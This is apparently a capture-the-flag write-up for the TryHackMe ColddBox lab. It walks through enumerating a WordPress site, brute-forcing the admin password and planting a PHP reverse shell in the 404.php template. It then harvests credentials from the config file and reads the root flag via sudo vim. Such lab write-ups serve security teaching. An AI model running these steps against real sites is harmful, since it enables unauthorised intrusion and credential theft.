Hello guys back again with another walkthrough. This time we’ll be tackling colddbox from Tryhackme.
As usual we will start with NMAP for scanning the target
> nmap –sC –A <target_ip>
Well there are several ports open and one interesting open port is 80.
Now let’s fire up directory bruteforcing tool. My favorite is Gobuster
> gobuster dir -u <target_url> -w <wordlist>
Here we can see several directory list that this tool was able to find which were initially hidden. This also gave us a hint that the site is using a wordpress CMS, which means the site is running on a wordpress content management system.
Now since we know it’s a wordpress site, lets enumerate further by using a cool tool called WP-SCAN to scan the site for vulnerability and also enumerate the site for users.
> wpscan –url <target_url> -e u1–5
Now after enumerating the site for user, we got a few username. But knowing the user to bruteforce we didn’t have to guess. Now if you could remember earlier in our n map scan we found port 80 open and then we used a directory brueforcinfg tool which gave use several hidden directory, on which was /hidden . when we visit the site we get hint at the admin user name. see this
Now we will use that admin user name to bruteforce the wp-admin page to get a password for that user which will give use our initial entry in to the site’s admin page
Wpscan –url <target_ip> -U <username> -P <passwordlist>
Now we have the password lets login into the site using the credentials we found
Okay! We now have access to the admin page; we’ll edit a 404.php template and use it to get a shell on the box. Navigating to appearance then click editor options clicking the editor directs us to themes-editor.php which we can use to edit the 404.php template. Here I uploaded a php reveerse shell, adding my host ip and port to listen on. Then I’ll start netcat on my host to listen for any reverse connection from the target machine.
now navigate to this path to get a reverse shell on your machine after uploading your reverse shell on the 404.php
Ok now we got a shell lets upgrade the shell to enable us use commands which weren’t possible with the previous shell we got
> python3 –c ‘import pty;pty.spawn(“/bin/bash”)’
After upgrading my shell, first I navigated to c0ldd’s home directory but couldn’t read the user.txt flag which made me to start looking for credentials in WordPress config file to elevate my privilege, luckily I found a username and password which I used to login as the user c0ldd.
Now I can navigate to the home directory of c0ldd and obtain the first flag
Gaining root Access
Now to escalate my privilege to root and capture the second flag.
> sudo –l
This listed out several command the user c0ldd can run as root, the one I used was /usr/bin/vim
So now to obtain the root flag I simply did this and yes I obtained to root flag successfully
> sudo /usr/bin/vim /root/root.txt
There you go, you have your root flag.
Thanks for using this walkthrough and I hope it useful.
regards
NIRU IFEDINIRU OZIOMA